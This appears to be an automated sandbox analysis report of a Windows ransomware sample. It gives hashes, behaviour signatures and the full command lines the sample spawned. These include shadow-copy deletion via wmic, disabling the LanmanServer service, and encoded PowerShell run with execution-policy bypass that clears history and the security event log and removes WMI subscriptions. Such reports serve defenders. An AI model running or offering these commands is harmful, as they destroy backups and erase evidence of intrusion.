Analysis
-
max time kernel
143s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
06-03-2022 04:49
Static task
static1
Behavioral task
behavioral1
Sample
b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe
Resource
win10v2004-en-20220112
General
-
Target
b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe
-
Size
244KB
-
MD5
81fe203efa1ce2d19eb707e21f929871
-
SHA1
8ae79ec18aabfa335c25efcae1e895c8e920b856
-
SHA256
b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d
-
SHA512
451dadeb19a8c88a1d4927803aeee34a3ce30a71d7740d86f8be7fab49a6042259532f94163a8c5a58f8555946e8c91129c5f21de056f8ba3f7ba9add0471241
Malware Config
Extracted
C:\readme-warning.txt
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\dmap b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe File created C:\Windows\dmap2 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3568 powershell.exe 2148 powershell.exe 3808 powershell.exe 2316 powershell.exe 3604 powershell.exe 2660 powershell.exe 2476 powershell.exe 3568 powershell.exe 2476 powershell.exe 2316 powershell.exe 2148 powershell.exe 2660 powershell.exe 3808 powershell.exe 3604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2104 wmic.exe Token: SeSecurityPrivilege 2104 wmic.exe Token: SeTakeOwnershipPrivilege 2104 wmic.exe Token: SeLoadDriverPrivilege 2104 wmic.exe Token: SeSystemProfilePrivilege 2104 wmic.exe Token: SeSystemtimePrivilege 2104 wmic.exe Token: SeProfSingleProcessPrivilege 2104 wmic.exe Token: SeIncBasePriorityPrivilege 2104 wmic.exe Token: SeCreatePagefilePrivilege 2104 wmic.exe Token: SeBackupPrivilege 2104 wmic.exe Token: SeRestorePrivilege 2104 wmic.exe Token: SeShutdownPrivilege 2104 wmic.exe Token: SeDebugPrivilege 2104 wmic.exe Token: SeSystemEnvironmentPrivilege 2104 wmic.exe Token: SeRemoteShutdownPrivilege 2104 wmic.exe Token: SeUndockPrivilege 2104 wmic.exe Token: SeManageVolumePrivilege 2104 wmic.exe Token: 33 2104 wmic.exe Token: 34 2104 wmic.exe Token: 35 2104 wmic.exe Token: 36 2104 wmic.exe Token: SeIncreaseQuotaPrivilege 2104 wmic.exe Token: SeSecurityPrivilege 2104 wmic.exe Token: SeTakeOwnershipPrivilege 2104 wmic.exe Token: SeLoadDriverPrivilege 2104 wmic.exe Token: SeSystemProfilePrivilege 2104 wmic.exe Token: SeSystemtimePrivilege 2104 wmic.exe Token: SeProfSingleProcessPrivilege 2104 wmic.exe Token: SeIncBasePriorityPrivilege 2104 wmic.exe Token: SeCreatePagefilePrivilege 2104 wmic.exe Token: SeBackupPrivilege 2104 wmic.exe Token: SeRestorePrivilege 2104 wmic.exe Token: SeShutdownPrivilege 2104 wmic.exe Token: SeDebugPrivilege 2104 wmic.exe Token: SeSystemEnvironmentPrivilege 2104 wmic.exe Token: SeRemoteShutdownPrivilege 2104 wmic.exe Token: SeUndockPrivilege 2104 wmic.exe Token: SeManageVolumePrivilege 2104 wmic.exe Token: 33 2104 wmic.exe Token: 34 2104 wmic.exe Token: 35 2104 wmic.exe Token: 36 2104 wmic.exe Token: SeBackupPrivilege 1872 vssvc.exe Token: SeRestorePrivilege 1872 vssvc.exe Token: SeAuditPrivilege 1872 vssvc.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 2148 powershell.exe Token: SeDebugPrivilege 3604 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeSecurityPrivilege 2148 powershell.exe Token: SeBackupPrivilege 2148 powershell.exe Token: SeSecurityPrivilege 2148 powershell.exe Token: SeSecurityPrivilege 3604 powershell.exe Token: SeBackupPrivilege 3604 powershell.exe Token: SeSecurityPrivilege 3604 powershell.exe Token: SeSecurityPrivilege 3604 powershell.exe Token: SeBackupPrivilege 3604 powershell.exe Token: SeSecurityPrivilege 2148 powershell.exe Token: SeBackupPrivilege 2148 powershell.exe Token: SeBackupPrivilege 820 vssvc.exe Token: SeRestorePrivilege 820 vssvc.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2948 wrote to memory of 2476 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 56 PID 2948 wrote to memory of 2476 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 56 PID 2948 wrote to memory of 2476 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 56 PID 2948 wrote to memory of 3604 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 58 PID 2948 wrote to memory of 3604 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 58 PID 2948 wrote to memory of 3604 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 58 PID 2948 wrote to memory of 3568 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 57 PID 2948 wrote to memory of 3568 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 57 PID 2948 wrote to memory of 3568 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 57 PID 2948 wrote to memory of 4012 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 59 PID 2948 wrote to memory of 4012 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 59 PID 2948 wrote to memory of 4012 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 59 PID 2948 wrote to memory of 3808 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 64 PID 2948 wrote to memory of 3808 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 64 PID 2948 wrote to memory of 3808 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 64 PID 2948 wrote to memory of 2104 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 76 PID 2948 wrote to memory of 2104 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 76 PID 2948 wrote to memory of 2104 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 76 PID 2948 wrote to memory of 2660 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 75 PID 2948 wrote to memory of 2660 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 75 PID 2948 wrote to memory of 2660 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 75 PID 2948 wrote to memory of 2148 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 74 PID 2948 wrote to memory of 2148 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 74 PID 2948 wrote to memory of 2148 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 74 PID 2948 wrote to memory of 2316 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 68 PID 2948 wrote to memory of 2316 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 68 PID 2948 wrote to memory of 2316 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 68 PID 2948 wrote to memory of 3436 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 67 PID 2948 wrote to memory of 3436 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 67 PID 2948 wrote to memory of 3436 2948 b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe 67
Processes
-
C:\Users\Admin\AppData\Local\Temp\b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe"C:\Users\Admin\AppData\Local\Temp\b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ASABpAHMAdABvAHIAeQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ARQB2AGUAbgB0AGwAbwBnACAALQBMAG8AZwBOAGEAbQBlACAAcwBlAGMAdQByAGkAdAB5AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Windows\SysWOW64\sc.exesc config LanmanServer start= disabled2⤵PID:4012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass -e RwBlAHQALQBXAE0ASQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAUwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBFAHYAZQBuAHQARgBpAGwAdABlAHIAIAAtAEYAaQBsAHQAZQByACAAIgBOAGEAbQBlAD0AJwBmAHUAYwBrAGEAbQBtADMAJwAiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAFYAZQByAGIAbwBzAGUADQAKAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUARQB2AGUAbgB0AEMAbwBuAHMAdQBtAGUAcgAgAC0ARgBpAGwAdABlAHIAIAAiAE4AYQBtAGUAPQAnAGYAdQBjAGsAYQBtAG0AMwAnACIAIAB8ACAAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AVgBlAHIAYgBvAHMAZQANAAoARwBlAHQALQBXAE0ASQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAUwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAEYAaQBsAHQAZQByACAAIgBfAF8AUABhAHQAaAAgAEwASQBLAEUAIAAnACUAZgB1AGMAawBhAG0AbQAzACUAJwAiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAFYAZQByAGIAbwBzAGUADQAKAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABfAF8ARQB2AGUAbgB0AEYAaQBsAHQAZQByACAALQBGAGkAbAB0AGUAcgAgACIATgBhAG0AZQA9ACcAZgB1AGMAawBhAG0AbQA0ACcAIgAgAHwAIABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBWAGUAcgBiAG8AcwBlAA0ACgBHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABTAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAC0AQwBsAGEAcwBzACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlAEUAdgBlAG4AdABDAG8AbgBzAHUAbQBlAHIAIAAtAEYAaQBsAHQAZQByACAAIgBOAGEAbQBlAD0AJwBmAHUAYwBrAGEAbQBtADQAJwAiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAFYAZQByAGIAbwBzAGUADQAKAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBGAGkAbAB0AGUAcgAgACIAXwBfAFAAYQB0AGgAIABMAEkASwBFACAAJwAlAGYAdQBjAGsAYQBtAG0ANAAlACcAIgAgAHwAIABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBWAGUAcgBiAG8AcwBlAA0ACgANAAoAAAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
C:\Windows\SysWOW64\sc.exesc config LanmanServer start= disabled2⤵PID:3436
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ASABpAHMAdABvAHIAeQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ARQB2AGUAbgB0AGwAbwBnACAALQBMAG8AZwBOAGEAbQBlACAAcwBlAGMAdQByAGkAdAB5AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic shadowcopy delete /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:820